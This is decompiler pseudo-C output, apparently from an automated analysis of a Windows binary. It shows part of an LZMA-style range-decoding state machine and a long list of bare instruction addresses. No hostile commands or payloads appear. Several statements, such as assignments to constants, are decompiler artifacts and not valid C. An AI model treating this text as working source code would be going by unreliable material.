                                                                                      						case 0x11:
                                                                                      							L68:
                                                                                      							__esi =  *(__ebp - 0x58);
                                                                                      							 *(__ebp - 0x84) = 0x12;
                                                                                      							goto L132;
                                                                                      						case 0x12:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							__eflags = __eax;
                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      							goto L130;
                                                                                      						case 0x13:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								_t469 = __ebp - 0x58;
                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      								__eflags =  *_t469;
                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                      								L144:
                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                      								goto L145;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      							L130:
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                      							goto L144;
                                                                                      						case 0x14:
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                      							goto L140;
                                                                                      						case 0x15:
                                                                                      							__eax = 0;
                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      							__al = __al & 0x000000fd;
                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      							goto L120;
                                                                                      						case 0x16:
                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                      							__eflags = __eax - 4;
                                                                                      							if(__eax >= 4) {
                                                                                      								_push(3);
                                                                                      								_pop(__eax);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 4);
                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                      							__eax = __eax << 7;
                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							goto L145;
                                                                                      						case 0x17:
                                                                                      							L145:
                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      							goto L149;
                                                                                      						case 0x18:
                                                                                      							L146:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t484 = __ebp - 0x70;
                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t484;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L148:
                                                                                      							_t487 = __ebp - 0x48;
                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      							__eflags =  *_t487;
                                                                                      							L149:
                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                      								0 = 1;
                                                                                      								__eax = 1 << __cl;
                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      								__eax =  *(__ebp - 0x7c);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								goto L140;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x50);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__esi = __edx + __eax;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__ax =  *__esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eax = __eax - __ecx;
                                                                                      								__edx = __edx + 1;
                                                                                      								__eflags = __edx;
                                                                                      								 *__esi = __ax;
                                                                                      								 *(__ebp - 0x50) = __edx;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L148;
                                                                                      							} else {
                                                                                      								goto L146;
                                                                                      							}
                                                                                      						case 0x19:
                                                                                      							__eflags = __ebx - 4;
                                                                                      							if(__ebx < 4) {
                                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                                      								L119:
                                                                                      								_t393 = __ebp - 0x2c;
                                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      								__eflags =  *_t393;
                                                                                      								L120:
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax;
                                                                                      								if(__eax == 0) {
                                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      									goto L170;
                                                                                      								}
                                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                                      									goto L171;
                                                                                      								}
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      								__eax =  *(__ebp - 0x30);
                                                                                      								_t400 = __ebp - 0x60;
                                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      								__eflags =  *_t400;
                                                                                      								goto L123;
                                                                                      							}
                                                                                      							__ecx = __ebx;
                                                                                      							__eax = __ebx;
                                                                                      							__ecx = __ebx >> 1;
                                                                                      							__eax = __ebx & 0x00000001;
                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                      							__al = __al | 0x00000002;
                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                      							__eflags = __ebx - 0xe;
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							if(__ebx >= 0xe) {
                                                                                      								__ebx = 0;
                                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                                      								L102:
                                                                                      								__eflags =  *(__ebp - 0x48);
                                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                                      									__eax = __eax + __ebx;
                                                                                      									 *(__ebp - 0x40) = 4;
                                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                                      									__eax =  *(__ebp - 4);
                                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                                      									__eflags = __eax;
                                                                                      									L108:
                                                                                      									__ebx = 0;
                                                                                      									 *(__ebp - 0x58) = __eax;
                                                                                      									 *(__ebp - 0x50) = 1;
                                                                                      									 *(__ebp - 0x44) = 0;
                                                                                      									 *(__ebp - 0x48) = 0;
                                                                                      									L112:
                                                                                      									__eax =  *(__ebp - 0x40);
                                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      										_t391 = __ebp - 0x2c;
                                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      										__eflags =  *_t391;
                                                                                      										goto L119;
                                                                                      									}
                                                                                      									__eax =  *(__ebp - 0x50);
                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      									__eax =  *(__ebp - 0x58);
                                                                                      									__esi = __edi + __eax;
                                                                                      									 *(__ebp - 0x54) = __esi;
                                                                                      									__ax =  *__esi;
                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                                      										__ecx = 0;
                                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      										__ecx = 1;
                                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      										__ebx = 1;
                                                                                      										__ecx =  *(__ebp - 0x48);
                                                                                      										__ebx = 1 << __cl;
                                                                                      										__ecx = 1 << __cl;
                                                                                      										__ebx =  *(__ebp - 0x44);
                                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      										__cx = __ax;
                                                                                      										__cx = __ax >> 5;
                                                                                      										__eax = __eax - __ecx;
                                                                                      										__edi = __edi + 1;
                                                                                      										__eflags = __edi;
                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                      										 *__esi = __ax;
                                                                                      										 *(__ebp - 0x50) = __edi;
                                                                                      									} else {
                                                                                      										 *(__ebp - 0x10) = __edx;
                                                                                      										0x800 = 0x800 - __ecx;
                                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      										 *__esi = __dx;
                                                                                      									}
                                                                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      										L111:
                                                                                      										_t368 = __ebp - 0x48;
                                                                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      										__eflags =  *_t368;
                                                                                      										goto L112;
                                                                                      									} else {
                                                                                      										goto L109;
                                                                                      									}
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0xc);
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      									__ecx =  *(__ebp - 0x10);
                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      									__ebx = __ebx | 0x00000001;
                                                                                      									__eflags = __ebx;
                                                                                      									 *(__ebp - 0x44) = __ebx;
                                                                                      								}
                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      									L101:
                                                                                      									_t338 = __ebp - 0x48;
                                                                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      									__eflags =  *_t338;
                                                                                      									goto L102;
                                                                                      								} else {
                                                                                      									goto L99;
                                                                                      								}
                                                                                      							}
                                                                                      							__edx =  *(__ebp - 4);
                                                                                      							__eax = __eax - __ebx;
                                                                                      							 *(__ebp - 0x40) = __ecx;
                                                                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      							goto L108;
                                                                                      						case 0x1a:
                                                                                      							goto L55;
                                                                                      						case 0x1b:
                                                                                      							L75:
                                                                                      							__eflags =  *(__ebp - 0x64);
                                                                                      							if( *(__ebp - 0x64) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x1b;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      							__eflags = __eax -  *(__ebp - 0x74);
                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                      								__eflags = __eax;
                                                                                      							}
                                                                                      							__edx =  *(__ebp - 8);
                                                                                      							__cl =  *(__eax + __edx);
                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                      							 *(__ebp - 0x5c) = __cl;
                                                                                      							 *(__eax + __edx) = __cl;
                                                                                      							__eax = __eax + 1;
                                                                                      							__edx = 0;
                                                                                      							_t274 = __eax %  *(__ebp - 0x74);
                                                                                      							__eax = __eax /  *(__ebp - 0x74);
                                                                                      							__edx = _t274;
                                                                                      							__eax =  *(__ebp - 0x68);
                                                                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      							_t283 = __ebp - 0x64;
                                                                                      							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      							__eflags =  *_t283;
                                                                                      							 *( *(__ebp - 0x68)) = __cl;
                                                                                      							goto L79;
                                                                                      						case 0x1c:
                                                                                      							while(1) {
                                                                                      								L123:
                                                                                      								__eflags =  *(__ebp - 0x64);
                                                                                      								if( *(__ebp - 0x64) == 0) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                      									__eflags = __eax;
                                                                                      								}
                                                                                      								__edx =  *(__ebp - 8);
                                                                                      								__cl =  *(__eax + __edx);
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								 *(__ebp - 0x5c) = __cl;
                                                                                      								 *(__eax + __edx) = __cl;
                                                                                      								__eax = __eax + 1;
                                                                                      								__edx = 0;
                                                                                      								_t414 = __eax %  *(__ebp - 0x74);
                                                                                      								__eax = __eax /  *(__ebp - 0x74);
                                                                                      								__edx = _t414;
                                                                                      								__eax =  *(__ebp - 0x68);
                                                                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      								__eflags =  *(__ebp - 0x30);
                                                                                      								 *( *(__ebp - 0x68)) = __cl;
                                                                                      								 *(__ebp - 0x14) = __edx;
                                                                                      								if( *(__ebp - 0x30) > 0) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L80;
                                                                                      								}
                                                                                      							}
                                                                                      							 *(__ebp - 0x88) = 0x1c;
                                                                                      							goto L170;
                                                                                      					}
                                                                                      				}
                                                                                      			}













                                                                                      0x00000000
                                                                                      0x00406c5b
                                                                                      0x00406c5b
                                                                                      0x00406c60
                                                                                      0x00406cd7
                                                                                      0x00406cde
                                                                                      0x00406ce8
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x0040733d
                                                                                      0x0040733d
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00407318
                                                                                      0x00407318
                                                                                      0x0040731c
                                                                                      0x004074cb
                                                                                      0x00000000
                                                                                      0x004074cb
                                                                                      0x00407328
                                                                                      0x0040732f
                                                                                      0x00407337
                                                                                      0x0040733a
                                                                                      0x00000000
                                                                                      0x0040733a
                                                                                      0x00406c62
                                                                                      0x00406c62
                                                                                      0x00406c66
                                                                                      0x00406c6e
                                                                                      0x00406c71
                                                                                      0x00406c73
                                                                                      0x00406c76
                                                                                      0x00406c78
                                                                                      0x00406c7d
                                                                                      0x00406c80
                                                                                      0x00406c87
                                                                                      0x00406c8e
                                                                                      0x00406c91
                                                                                      0x00406c9c
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406cab
                                                                                      0x00406cc9
                                                                                      0x00406ccb
                                                                                      0x00406e9e
                                                                                      0x00406e9e
                                                                                      0x00406ea1
                                                                                      0x00406ea4
                                                                                      0x00406ea7
                                                                                      0x00406eaa
                                                                                      0x00406ead
                                                                                      0x00406eb0
                                                                                      0x00406eb3
                                                                                      0x00406eb6
                                                                                      0x00406ebc
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406ee0
                                                                                      0x00406ee6
                                                                                      0x00406ebe
                                                                                      0x00406ebe
                                                                                      0x00406ec6
                                                                                      0x00406ecb
                                                                                      0x00406ecd
                                                                                      0x00406ecf
                                                                                      0x00406ecf
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00406e96
                                                                                      0x00406e9c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00406e71
                                                                                      0x00406e75
                                                                                      0x0040747d
                                                                                      0x00000000
                                                                                      0x0040747d
                                                                                      0x00406e7b
                                                                                      0x00406e7e
                                                                                      0x00406e81
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8e
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e93
                                                                                      0x00000000
                                                                                      0x00406e93
                                                                                      0x00406cad
                                                                                      0x00406cad
                                                                                      0x00406cb0
                                                                                      0x00406cb6
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc0
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d35
                                                                                      0x00406d38
                                                                                      0x00406d3b
                                                                                      0x00406d3e
                                                                                      0x00406d41
                                                                                      0x00406d42
                                                                                      0x00406d45
                                                                                      0x00406d47
                                                                                      0x00406d4d
                                                                                      0x00406d50
                                                                                      0x00406d53
                                                                                      0x00406d56
                                                                                      0x00406d59
                                                                                      0x00406d5f
                                                                                      0x00406d7b
                                                                                      0x00406d7e
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d91
                                                                                      0x00406d95
                                                                                      0x00406d61
                                                                                      0x00406d61
                                                                                      0x00406d65
                                                                                      0x00406d6d
                                                                                      0x00406d72
                                                                                      0x00406d74
                                                                                      0x00406d76
                                                                                      0x00406d76
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00406d19
                                                                                      0x00406d19
                                                                                      0x00406d1f
                                                                                      0x00406dd2
                                                                                      0x00406dd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dda
                                                                                      0x00406ddd
                                                                                      0x00406de0
                                                                                      0x00406de3
                                                                                      0x00406de6
                                                                                      0x00406de9
                                                                                      0x00406dec
                                                                                      0x00406def
                                                                                      0x00406df2
                                                                                      0x00406df8
                                                                                      0x00406e10
                                                                                      0x00406e13
                                                                                      0x00406e16
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1c
                                                                                      0x00406e22
                                                                                      0x00406dfa
                                                                                      0x00406dfa
                                                                                      0x00406e02
                                                                                      0x00406e07
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0b
                                                                                      0x00406e2c
                                                                                      0x00406e2f
                                                                                      0x00406dad
                                                                                      0x00406db1
                                                                                      0x00407471
                                                                                      0x00000000
                                                                                      0x00407471
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbd
                                                                                      0x00406dc1
                                                                                      0x00406dc4
                                                                                      0x00406dca
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcf
                                                                                      0x00406dcf
                                                                                      0x00406e2f
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e3a
                                                                                      0x00406e3a
                                                                                      0x00406e3d
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x00406d2b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00406cf4
                                                                                      0x00406cf8
                                                                                      0x00407465
                                                                                      0x004074e1
                                                                                      0x004074e9
                                                                                      0x004074f0
                                                                                      0x004074f2
                                                                                      0x004074f9
                                                                                      0x004074fd
                                                                                      0x004074fd
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d04
                                                                                      0x00406d08
                                                                                      0x00406d0b
                                                                                      0x00406d11
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d16
                                                                                      0x00000000
                                                                                      0x00406d16
                                                                                      0x00406da2
                                                                                      0x00406cab
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406ae8
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000
                                                                                      0x004074f6
                                                                                      0x00406aee
                                                                                      0x00000000
                                                                                      0x00406af9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b02
                                                                                      0x00406b05
                                                                                      0x00406b08
                                                                                      0x00406b0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b12
                                                                                      0x00406b15
                                                                                      0x00406b17
                                                                                      0x00406b18
                                                                                      0x00406b1b
                                                                                      0x00406b1d
                                                                                      0x00406b1e
                                                                                      0x00406b20
                                                                                      0x00406b23
                                                                                      0x00406b28
                                                                                      0x00406b2d
                                                                                      0x00406b36
                                                                                      0x00406b49
                                                                                      0x00406b4c
                                                                                      0x00406b58
                                                                                      0x00406b80
                                                                                      0x00406b82
                                                                                      0x00406b90
                                                                                      0x00406b90
                                                                                      0x00406b94
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b84
                                                                                      0x00406b87
                                                                                      0x00406b88
                                                                                      0x00406b88
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b5e
                                                                                      0x00406b63
                                                                                      0x00406b63
                                                                                      0x00406b6c
                                                                                      0x00406b74
                                                                                      0x00406b77
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b9a
                                                                                      0x00406b9a
                                                                                      0x00406b9e
                                                                                      0x0040744a
                                                                                      0x00000000
                                                                                      0x0040744a
                                                                                      0x00406ba7
                                                                                      0x00406bb7
                                                                                      0x00406bba
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bc0
                                                                                      0x00406bc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bc6
                                                                                      0x00406bcc
                                                                                      0x00406bf6
                                                                                      0x00406bfc
                                                                                      0x00406c03
                                                                                      0x00000000
                                                                                      0x00406c03
                                                                                      0x00406bd2
                                                                                      0x00406bd5
                                                                                      0x00406bda
                                                                                      0x00406bda
                                                                                      0x00406be5
                                                                                      0x00406bed
                                                                                      0x00406bf0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c35
                                                                                      0x00406c3b
                                                                                      0x00406c3e
                                                                                      0x00406c4b
                                                                                      0x00406c53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c0a
                                                                                      0x00406c0a
                                                                                      0x00406c0e
                                                                                      0x00407459
                                                                                      0x00000000
                                                                                      0x00407459
                                                                                      0x00406c1a
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c28
                                                                                      0x00406c2b
                                                                                      0x00406c2e
                                                                                      0x00406c33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406efa
                                                                                      0x00406efe
                                                                                      0x00406f1c
                                                                                      0x00406f1f
                                                                                      0x00406f26
                                                                                      0x00406f29
                                                                                      0x00406f2c
                                                                                      0x00406f2f
                                                                                      0x00406f32
                                                                                      0x00406f35
                                                                                      0x00406f37
                                                                                      0x00406f3e
                                                                                      0x00406f3f
                                                                                      0x00406f41
                                                                                      0x00406f44
                                                                                      0x00406f47
                                                                                      0x00406f4a
                                                                                      0x00406f4a
                                                                                      0x00406f4f
                                                                                      0x00000000
                                                                                      0x00406f4f
                                                                                      0x00406f00
                                                                                      0x00406f03
                                                                                      0x00406f06
                                                                                      0x00406f10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f64
                                                                                      0x00406f68
                                                                                      0x00406f8b
                                                                                      0x00406f8e
                                                                                      0x00406f91
                                                                                      0x00406f9b
                                                                                      0x00406f6a
                                                                                      0x00406f6a
                                                                                      0x00406f6d
                                                                                      0x00406f70
                                                                                      0x00406f73
                                                                                      0x00406f80
                                                                                      0x00406f83
                                                                                      0x00406f83
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fa7
                                                                                      0x00406fab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fb1
                                                                                      0x00406fb5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fbb
                                                                                      0x00406fbd
                                                                                      0x00406fc1
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00406fc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407018
                                                                                      0x0040701c
                                                                                      0x00407023
                                                                                      0x00407026
                                                                                      0x00407029
                                                                                      0x00407033
                                                                                      0x00000000
                                                                                      0x00407033
                                                                                      0x0040701e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040703f
                                                                                      0x00407043
                                                                                      0x0040704a
                                                                                      0x0040704d
                                                                                      0x00407050
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407053
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00407059
                                                                                      0x0040705c
                                                                                      0x0040705f
                                                                                      0x00407062
                                                                                      0x00407062
                                                                                      0x00407065
                                                                                      0x0040706c
                                                                                      0x00407071
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ff
                                                                                      0x004070ff
                                                                                      0x00407103
                                                                                      0x004074a1
                                                                                      0x00000000
                                                                                      0x004074a1
                                                                                      0x00407109
                                                                                      0x0040710c
                                                                                      0x0040710f
                                                                                      0x00407113
                                                                                      0x00407116
                                                                                      0x0040711c
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x00407121
                                                                                      0x00407124
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407182
                                                                                      0x00407182
                                                                                      0x00407186
                                                                                      0x004074ad
                                                                                      0x00000000
                                                                                      0x004074ad
                                                                                      0x0040718c
                                                                                      0x0040718f
                                                                                      0x00407192
                                                                                      0x00407196
                                                                                      0x00407199
                                                                                      0x0040719f
                                                                                      0x004071a1
                                                                                      0x004071a1
